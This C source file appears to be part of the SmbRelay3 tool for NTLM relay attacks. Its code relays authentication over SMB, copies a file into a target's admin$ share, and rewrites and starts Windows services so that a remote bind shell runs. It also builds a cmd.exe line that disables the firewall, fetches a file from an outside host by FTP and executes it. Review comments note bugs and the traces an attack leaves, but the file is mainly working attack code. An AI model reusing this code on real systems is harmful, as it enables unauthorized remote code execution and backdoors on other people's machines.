00001 #include "payload.h"
00002 #include <time.h>
00003
00004
/* Verbosity flag defined in another translation unit; read by the
 * CleanLine(verbose) calls and the `if (verbose)` block in WriteRemoteFile().
 * (`debug`, also tested below, is not declared in this file -- presumably
 * it comes from payload.h; confirm.) */
extern int verbose;
/*
 * Walk a fixed list of Windows service names over an SMB_COM_TRANSACTION
 * channel identified by FID (presumably the service-control named pipe --
 * confirm in the caller) and, for the first service that can be opened,
 * point its configuration at ServicePath and send a start request.
 *
 * relay       - relay state; only relay.destination (socket) and
 *               relay.hostname (final status line) are read.
 * buf         - caller-owned scratch area, used both as the header
 *               template for BuildSmbPacket() and as the receive buffer.
 * path        - forwarded to OpenScManagerWStub() as the SCM machine path.
 * FID         - file id stamped into every transaction request.
 * ServicePath - new binary path written by ChangeServiceConfigWStub().
 *
 * Returns 1 as soon as one service has been reconfigured and a start
 * request has been sent; 0 if the SCM could not be opened or none of the
 * listed services could be opened and modified.
 *
 * Review notes:
 *  - buf is a pointer parameter, so sizeof(buf) on the three
 *    SendBytesAndWaitForResponse() calls is sizeof(char *), not the
 *    caller's buffer length; the real bound has to come from the caller.
 *  - Each step is an ordinary SCM RPC (open manager, open service, change
 *    config, start). A service binary path being rewritten and the service
 *    then started is the host-side artifact a defender would look for.
 */
int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath){

    smheader *packet;
    uint8 ContextHandle[20];              /* SCM handle returned by OpenSCManagerW */
    uint8 OpenedServiceContextHandle[20]; /* handle of the service currently being modified */
    /* Candidate services, stored as fixed 100-byte rows; the loop bound
     * below divides sizeof by that row width to get the count. */
    char ServiceName[][100] = {"DcomLaunch","Wmi","kdc","upnpHost","SSDPSRV","DHCP","NetBT","DnsCache","Pml Driver HPZ12","Adobe LM Service","Autodesk Licensing Service", "NICCONFIGSVC","Macromedia Licensing Service","vsdatant","C-DillaCdaC11BA","CdaC15BA","SecDrv" };
    int len;
    char data[4046];  /* stub (RPC request body) scratch buffer */
    int i,j;

    /* Step 1: OpenSCManagerW with SC_MANAGER_CONNECT. */
    len=OpenScManagerWStub(data,path,SC_MANAGER_CONNECT) ;
    packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSCMANAGER,(char*)data,len);
    ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
    printf("[+] Opening Remote Service Control Manager (SC_MANAGER_CONNECT)\n");
    /* NOTE(review): sizeof(buf) here is the size of a char *, not of the buffer. */
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    free(packet);
    /* Fail on transport error, non-zero NT status, or anything but an RPC response PDU. */
    if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
        return(0);
    }
    /* The 20-byte context handle sits 24 bytes before the end of the reply;
     * the remaining 4 bytes are presumably the stub's return code -- confirm
     * against the stub layout. */
    memcpy((char*)ContextHandle,buf+i-24,20);

    for (j=0;j<sizeof(ServiceName)/100;j++)
    {

        /* Step 2: OpenServiceW with the access needed for the next two calls. */
        len=OpenServiceWStub(data,(char*)ContextHandle,ServiceName[j], SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP);
        packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSERVICEW,data,len);
        ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
        printf("[+] Attacking Remote Service %s\n",ServiceName[j]);
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        free(packet);
        if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
            /* Service missing or access denied: try the next name. */
            printf("[-] Error. Unable to Open Remote service \n");
        } else {
            memcpy((char*)OpenedServiceContextHandle,buf+i-24,20);
            /* Step 3: ChangeServiceConfigW -> binary path ServicePath, auto start,
             * shared-process service type. */
            len=ChangeServiceConfigWStub(data,(char*)OpenedServiceContextHandle,ServicePath, SERVICE_AUTO_START,SERVICE_WIN32_SHARE_PROCESS);
            packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,CHANGESERVICECONFIG,data,len);
            ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
            /* Spanish: "Changing service configuration..." */
            printf("[+] Cambiando configuración de servicio...\r");
            i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
            free(packet);
            if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
                printf("[-] Error. Unable to Modify Service...\n");
            } else {
                /* Step 4: StartService. The request is fire-and-forget: the send()
                 * result is ignored and no reply is read; the Sleep() calls only
                 * pace the status output. */
                packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,STARTSERVICE,OpenedServiceContextHandle, 20);
                ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
                send(relay.destination, (char*)packet, SmbPacketLen(packet),0) ;
                free(packet);
                Sleep(1000);
                /* 8080 is a literal in the message only; nothing here verifies what
                 * the binary at ServicePath actually does or listens on. */
                printf("[+] *** Remote SmbRelay3 BindShell Service Running ***: (%s:%i)\n\n",relay.hostname,8080);
                Sleep(3000);
                return(1);
            }

        }
    }
    return(0);
}
00064
/*
 * Copy a local file into the destination host's admin$ share over the
 * authenticated SMB session described by `buffer`.
 *
 * Sequence: tree-connect to \\<dest ip>\admin$ (TREECONNETANDX), read the
 * local file into memory, NTCREATEANDX "\<lpFileName>", WRITEANDX the whole
 * contents in one packet, then SMBCLOSE the handle.
 *
 * relay      - relay state; relay.destination (socket) and
 *              relay.destinationaddr (for the UNC path) are read.
 * buffer     - SMB header template for the first packet; each later packet
 *              is templated from the most recent reply in `buf`.
 * lpFileName - local file to read; the same name is used for the remote
 *              file under admin$.
 *
 * Returns 1 on success, also 1 when the remote file already exists and is
 * in use (STATUS_SHARING_VIOLATION is treated as "already deployed"), and
 * 0 on any other failure.
 *
 * Review notes:
 *  - `debug` is not declared in this file; presumably payload.h -- confirm.
 *  - sprintf() into path[256] is unbounded; a long lpFileName (or a long
 *    printable address) overflows the stack buffer. snprintf(path,
 *    sizeof path, ...) with a length check would bound it.
 *  - filedata (allocated by ReadFileToSend) is freed only once the
 *    WRITEANDX packet has been built; both NTCREATEANDX error returns
 *    leak it.
 *  - The packets returned by BuildSmbPacket() are never free()d here,
 *    unlike in AttackWeakServices(); if BuildSmbPacket() allocates, every
 *    call in this function leaks one packet.
 *  - Writing a new file into admin$ and the tree-connect to that share are
 *    the observable events on the target side.
 */
int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName)
{
    char path[256];
    char buf[64000];     /* ~64 KiB on the stack: packet build area and receive buffer */
    smheader *packet;
    int i;
    int filesize;
    char *filedata;
    uint16 FID;
    uint16 TreeID;

    /* UNC path to the administrative share of the destination. */
    sprintf(path,"\\\\%s\\admin$",inet_ntoa(relay.destinationaddr.sin_addr));
    memset(buf,0,sizeof(buf));
    i=BuildTreeConnectAndXStub(buf,"",path,"?????");
    packet=BuildSmbPacket((smheader*)buffer,TREECONNETANDX,0,buf,i);
    printf("[+] Trying to connect to admin$\r");

    if (debug)
    {
        CleanLine(verbose);
        DumpMem((char*)packet,SmbPacketLen(packet));
    }
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
        printf("[-] Error. Unable to connect to admin$\n");
        return(0);
    }
    /* Keep the tree id from the connect reply; it is re-applied to the close packet. */
    TreeID=((smheader*)buf)->TreeId;


    /* Remote name is the bare local name, relative to the share root. */
    sprintf(path,"\\%s",lpFileName);
    filedata =ReadFileToSend(&filesize,lpFileName);
    if(!filedata)
    {
        CleanLine(verbose);
        printf("[-] Error. Unable to open %s\n",lpFileName);
        return(0);
    }
    /* filesize is passed as the length argument of the create request;
     * what BuildSmbPacket() does with it for NTCREATEANDX is not visible
     * here -- confirm. */
    packet=BuildSmbPacket((smheader*)buf,NTCREATEANDX,0,path,filesize);
    CleanLine(verbose);
    printf("[+] Creating Remote File %s under admin$\r",lpFileName);
    if (debug)
    {
        CleanLine(verbose);
        DumpMem((char*)packet,SmbPacketLen(packet));
    }
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
        /* NOTE(review): filedata is leaked on both returns below. */
        if ( ((smheader*)buf)->NtStatus == STATUS_SHARING_VIOLATION) {
            printf("[-] Remote File already in use (try to connect to the remote Shell).\n");
            return(1);
        }
        printf("[-] Error. Unable to create file under admin$ (Error 0x%x)\n",((smheader*)buf)->NtStatus);
        return(0);
    }
    /* FID is read from bytes 6..7 of the reply's parameter block --
     * presumably the FID field of the NT_CREATE_ANDX response; confirm. */
    memcpy((char*)&FID,((smheader*)buf)->buffer+6,2);
    CleanLine(verbose);
    printf("[+] Writing File %s into admin$ (%i bytes)\r",lpFileName,filesize);
    /* Whole file in a single WRITEANDX; the local copy is released once the
     * packet has been built from it. */
    packet=BuildSmbPacket((smheader*)buf,WRITEANDX,0,filedata,filesize);
    free(filedata);

    if (debug)
    {
        CleanLine(verbose);
        DumpMem((char*)packet,SmbPacketLen(packet));
    }
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
        printf("[-] Error. Unable to Write File.\n");
        return(0);
    }

    packet=BuildSmbPacket((smheader*)buf,SMBCLOSE,0,&FID,2);

    /* The close must carry the tree id of the admin$ connection. */
    packet->TreeId=TreeID;
    if (verbose)
    {
        CleanLine(verbose);
        printf("[*] Closing File handle - FID: %2.2x\r",FID);
        if (debug) DumpMem((char*)packet,SmbPacketLen(packet));
    }
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
        printf("[-] Error Closing File Handle\n");
        return(0);
    }
    return(1);

}
00158
00159
00160
00161
00162
/*
 * Build the first SESSION_SETUP_ANDX packet of an NTLM handshake: a
 * type-1 (negotiate) message produced by BuildAuthRequest() with no
 * user or domain, wrapped by BuildSmbPacket() with no header template.
 *
 * Returns whatever BuildSmbPacket() returns (ownership follows that
 * function's contract; callers elsewhere in this file free() packets it
 * builds).
 */
smheader *BuildSmbPacket1(void)
{
    char negotiate[4096] = {0};   /* zero-filled scratch for the type-1 message */

    BuildAuthRequest((tSmbNtlmAuthRequest*)negotiate, 0, NULL, NULL);
#ifdef _DBG_
    DumpMem((char*)negotiate, SmbLength((tSmbNtlmAuthRequest*)negotiate));
#endif
    /* Only the first 40 bytes of the message are carried in the packet. */
    return BuildSmbPacket((smheader*)NULL, SESSIONSETUPANDX, 0, negotiate, 40);
}
00176
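/*
 * Send Packet1 (the SESSION_SETUP_ANDX negotiate packet) to the relay's
 * destination socket and return the raw reply, which carries the NTLM
 * challenge consumed by GetSmbPacket3().
 *
 * Returns a heap buffer holding the reply -- the caller owns it and must
 * free() it -- or NULL if allocation fails or no reply arrives within
 * SMBWAITTIMEOUT. The original version leaked the 4096-byte buffer on the
 * no-reply path; it is now released before returning NULL.
 */
smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1)
{
    enum { REPLY_BUF_SIZE = 4096 };

    char *reply = malloc(REPLY_BUF_SIZE);
    if (!reply) {
        return NULL;
    }

    int got = SendBytesAndWaitForResponse(relay->destination, (char*)Packet1,
                                          SmbPacketLen(Packet1), reply,
                                          REPLY_BUF_SIZE, SMBWAITTIMEOUT);
    if (got <= 0) {
        free(reply);   /* no usable reply: do not leak the buffer */
        return NULL;
    }
    return (smheader*)reply;
}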
00187
/*
 * Build the third SESSION_SETUP_ANDX packet of an NTLM handshake: take the
 * challenge carried in SmbPacket2, let buildAuthResponse() produce the
 * type-3 (authenticate) message for lpUserName/lpPassword/domainname/host
 * (optionally seeded from OptionalNtlmPacket3), and wrap it with
 * BuildSmbPacket() using SmbPacket2 as the header template.
 *
 * Returns whatever BuildSmbPacket() returns.
 */
smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3)
{
    char authenticate[16384] = {0};   /* zero-filled scratch for the type-3 message */
    tSmbNtlmAuthChallenge *challenge = (tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2);
    tSmbNtlmAuthResponse *response = (tSmbNtlmAuthResponse*)authenticate;

    buildAuthResponse(challenge, response, 0, lpUserName, lpPassword, domainname, host, OptionalNtlmPacket3);

    /* The packet carries exactly the message length reported by SmbLength(). */
    int responseLen = (int)SmbLength(response);
    return BuildSmbPacket((smheader*)SmbPacket2, SESSIONSETUPANDX, 0, authenticate, responseLen);
}
00198
00199
00200
/*
 * Compose, into the caller-supplied `buffer`, one cmd.exe command line
 * that (1) runs <path>\downloadfile if it already exists, otherwise (2)
 * turns the Windows firewall off with netsh, creates a directory named
 * after a random number, writes an ftp.exe script (host/port, login,
 * binary mode, GET downloadfile) into it line by line with `echo`, runs
 * `ftp -s:` on that script and finally executes the downloaded file,
 * appending optionalparameter when it is non-NULL.
 *
 * Returns `buffer`.
 *
 * Review notes:
 *  - `buffer` has no length parameter and is filled by strcpy()/strcat()
 *    of fragments built with unbounded sprintf() into tmp[256]; host,
 *    username, password and downloadfile lengths are never checked, so
 *    both tmp and buffer can overflow. snprintf() with a size would bound
 *    each fragment.
 *  - rand() is seeded from time(0) and then re-seeded from its own first
 *    output, so both directory/file names derive from the current second.
 *  - The local named `random` collides with the POSIX random() function on
 *    non-Windows toolchains -- presumably only ever built on Windows.
 *  - The script written to disk holds the FTP username and password in
 *    clear text, and the command line changes the host firewall state:
 *    the numeric-named directory, the script file and the netsh change are
 *    durable on-host artifacts a defender can look for.
 *  - "bin" is echoed twice (before and after "lcd"); redundant but harmless.
 */
char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter)
{
    char tmp[256];        /* one command fragment at a time */
    char path[256];       /* "\<random>"  : working directory on the target */
    char fullpath[100];   /* "\<random>\<random>" : ftp script file inside it */
    int random=0;

    srand(time(0));
    random=rand();
    sprintf(path,"\\%i",random);
    srand(random);        /* second name is derived from the first number */
    random=rand();
    sprintf(fullpath,"%s\\%i",path,random);


    /* Skip the download when the file is already there; otherwise disable
     * the firewall and fall through to the download steps. */
    sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall set opmode DISABLE DISABLE & ",path,downloadfile,path,downloadfile);
    strcpy(buffer,tmp);

    sprintf(tmp,"md %s",path);
    strcat(buffer,tmp);
    /* ftp script body: "o host port", user, password, then commands. */
    sprintf(tmp,"&& echo o %s %i>%s",host, port,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",username,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",password,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo USER %s>>%s",username,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",password,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bin>>%s",fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo lcd %s>>%s",path,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bin>>%s",fullpath);   /* duplicate of the earlier "bin" */
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo GET %s>>%s",downloadfile,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bye>>%s",fullpath);
    strcat(buffer,tmp);
    /* Run the script non-interactively. */
    sprintf(tmp,"&& ftp -s:%s",fullpath);
    strcat(buffer,tmp);
    /* Finally execute what was fetched, with or without an argument. */
    if (optionalparameter) {
        sprintf(tmp,"&& %s\\%s %s",path,downloadfile,optionalparameter);
    } else {
        sprintf(tmp,"&& %s\\%s",path,downloadfile);
    }
    strcat(buffer,tmp);

    return(buffer);
}
00252
00253
00254